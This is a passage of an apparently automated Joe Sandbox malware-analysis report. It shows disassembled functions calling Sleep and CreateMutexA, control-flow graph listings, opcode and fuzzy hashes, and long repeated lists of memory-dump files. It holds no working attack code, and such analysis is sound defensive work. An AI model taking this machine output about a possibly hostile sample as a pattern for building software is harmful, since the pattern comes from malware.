                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: b5873981c6d75d702a9c25ae184ed48009510d5fc3ceb984924bb5a8384bc57b
                                                                                                                                                                                                                                                  • Instruction ID: 50975ef0a2ec2a0b928ce72fec4076cc259a1d62d31cf01015f6b2e086d6d85d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5873981c6d75d702a9c25ae184ed48009510d5fc3ceb984924bb5a8384bc57b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A312C31B091048BFF089B7CDC89B9DBB62EBD1330F244619E454A73D5C7B58981A751
                                                                                                                                                                                                                                                  Function 00F39F44 Relevance: 3.1, APIs: 2, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 576 f39f44-f39f64 580 f39f92-f39fae 576->580 581 f39f66-f39f72 576->581 584 f39fb0-f39fbc 580->584 585 f39fdc-f39ffb 580->585 582 f39f74-f39f82 581->582 583 f39f88-f39f8f call f4d663 581->583 582->583 586 f3a92b 582->586 583->580 588 f39fd2-f39fd9 call f4d663 584->588 589 f39fbe-f39fcc 584->589 590 f3a029-f3a916 call f480c0 585->590 591 f39ffd-f3a009 585->591 593 f3a953-f3a994 Sleep CreateMutexA 586->593 594 f3a92b call f66c6a 586->594 588->585 589->586 589->588 597 f3a00b-f3a019 591->597 598 f3a01f-f3a026 call f4d663 591->598 606 f3a9a7-f3a9a8 593->606 607 f3a996-f3a998 593->607 594->593 597->586 597->598 598->590 607->606 608 f3a99a-f3a9a5 607->608 608->606
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 376236533ed4a4ed243398db1aeef4899389728eb0e5384cc3bc26691ef27512
                                                                                                                                                                                                                                                  • Instruction ID: d6dbdf46a76bff1c2508713ae3d4a2bce199d087ee7130e6eae99054f9e2dff0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 376236533ed4a4ed243398db1aeef4899389728eb0e5384cc3bc26691ef27512
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB315B31B041048BFF189B7CDC88BADBB62EBC5330F204619E454E73D5D7B58981A762
                                                                                                                                                                                                                                                  Function 00F3A079 Relevance: 3.1, APIs: 2, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 610 f3a079-f3a099 614 f3a0c7-f3a0e3 610->614 615 f3a09b-f3a0a7 610->615 618 f3a111-f3a130 614->618 619 f3a0e5-f3a0f1 614->619 616 f3a0a9-f3a0b7 615->616 617 f3a0bd-f3a0c4 call f4d663 615->617 616->617 622 f3a930-f3a994 call f66c6a Sleep CreateMutexA 616->622 617->614 620 f3a132-f3a13e 618->620 621 f3a15e-f3a916 call f480c0 618->621 624 f3a0f3-f3a101 619->624 625 f3a107-f3a10e call f4d663 619->625 626 f3a140-f3a14e 620->626 627 f3a154-f3a15b call f4d663 620->627 640 f3a9a7-f3a9a8 622->640 641 f3a996-f3a998 622->641 624->622 624->625 625->618 626->622 626->627 627->621 641->640 642 f3a99a-f3a9a5 641->642 642->640
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 2d714e576abb2b8de1cb1c653625b4486f8955a9c40a96a68a0b6e47a2bb3cb0
                                                                                                                                                                                                                                                  • Instruction ID: cfbbbe7a1304eae2ac819752b5f73fd64b3baa9035820c4bf253de600ce63478
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d714e576abb2b8de1cb1c653625b4486f8955a9c40a96a68a0b6e47a2bb3cb0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54315B71B041049BEF18DB7DDC89B9DBB62DF92330F204619E494E73D1C7769981AB22
                                                                                                                                                                                                                                                  Function 00F3A1AE Relevance: 3.1, APIs: 2, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 644 f3a1ae-f3a1ce 648 f3a1d0-f3a1dc 644->648 649 f3a1fc-f3a218 644->649 650 f3a1f2-f3a1f9 call f4d663 648->650 651 f3a1de-f3a1ec 648->651 652 f3a246-f3a265 649->652 653 f3a21a-f3a226 649->653 650->649 651->650 658 f3a935 651->658 656 f3a293-f3a916 call f480c0 652->656 657 f3a267-f3a273 652->657 654 f3a228-f3a236 653->654 655 f3a23c-f3a243 call f4d663 653->655 654->655 654->658 655->652 661 f3a275-f3a283 657->661 662 f3a289-f3a290 call f4d663 657->662 665 f3a953-f3a994 Sleep CreateMutexA 658->665 666 f3a935 call f66c6a 658->666 661->658 661->662 662->656 674 f3a9a7-f3a9a8 665->674 675 f3a996-f3a998 665->675 666->665 675->674 676 f3a99a-f3a9a5 675->676 676->674
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
